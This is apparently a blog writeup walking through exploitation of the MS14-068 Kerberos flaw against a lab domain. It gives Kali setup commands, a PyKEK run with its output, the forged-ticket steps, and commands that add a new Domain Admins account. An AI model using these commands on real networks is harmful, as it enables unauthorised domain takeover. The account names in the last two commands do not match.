Here’s a quick writeup of exploiting MS14-068 using PyKEK and Kali.
Kali Prepwork
Install and Configure Kerberos
Install kerberos:
apt-get install krb5-user krb5-config
Create relevant kerberos config changes in /etc/krb5.conf
:
[libdefaults]
default_realm = pwn3d.local
[realms]
pwn3d.local = {
kdc = dc1.pwn3d.local
admin_server = dc1.pwn3d.local
default_domain = pwn3d.local
}
Point DNS to the DNS Server/domain controller so SRV records (e.g. _kerberos._tcp.*) will resolve correctly in /etc/resolv.conf
.
According to the TrustedSec blog, you’ll need to sync time with the domain controller. During my testing I didn’t perform any syncing and had no issues.
Download, Compile and Install Samba
The Kali Samba package is missing many of the Samba tools, including several that are very useful for exploiting MS14-068. The build steps below are based on mubix’s blog post Dumping NTDS.dit Domain Hashes Using Samba.
Download Samba 4.1.0 and the replication only patch.
wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz
wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt
Extract the tarball.
tar zxvf samba-4.1.0.tar.gz
mkdir src
mv samba-4.1.0 src/
Add the replication only patch.
patch -p0 < samba-4.1.0_replication-only-patch.txt
Build and install Samba.
cd src/samba-4.1.0/
./configure
make -j 2 && make install
Exploitation
Determine the user SID:
rpcclient $> lookupnames john.smith john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
Supply the SID and relevant config options to the python script and the magic happens.
# python ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
Password:
[+] Building AS-REQ for 192.168.115.10... Done!
[+] Sending AS-REQ to 192.168.115.10... Done!
[+] Receiving AS-REP from 192.168.115.10... Done!
[+] Parsing AS-REP from 192.168.115.10... Done!
[+] Building TGS-REQ for 192.168.115.10... Done!
[+] Sending TGS-REQ to 192.168.115.10... Done!
[+] Receiving TGS-REP from 192.168.115.10... Done!
[+] Parsing TGS-REP from 192.168.115.10... Done!
[+] Creating ccache file 'TGT_john.smith@pwn3d.local.ccache'... Done!
Make the TGT your kerberos TGT.
# mv TGT_john.smith@pwn3d.local.ccache /tmp/krb5cc_$(echo $UID)
PWN!
If all went well, you can now use kerberos to authenticate.
# smbclient -k -W pwn3d -U john.smith //dc1.pwn3d.local/C$ OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1] smb: \>
Create a new account and make it a member of the Domain Admins groups using the samba4 utilities/example code.
./user_add dc1.pwn3d.local kerberpwn3d2 Password1 -W pwn3d -U john.smith -k
./group_adduser dc1.pwn3d.local "Domain Admins" kerberpwn3d -W pwn3d -U john.smith -k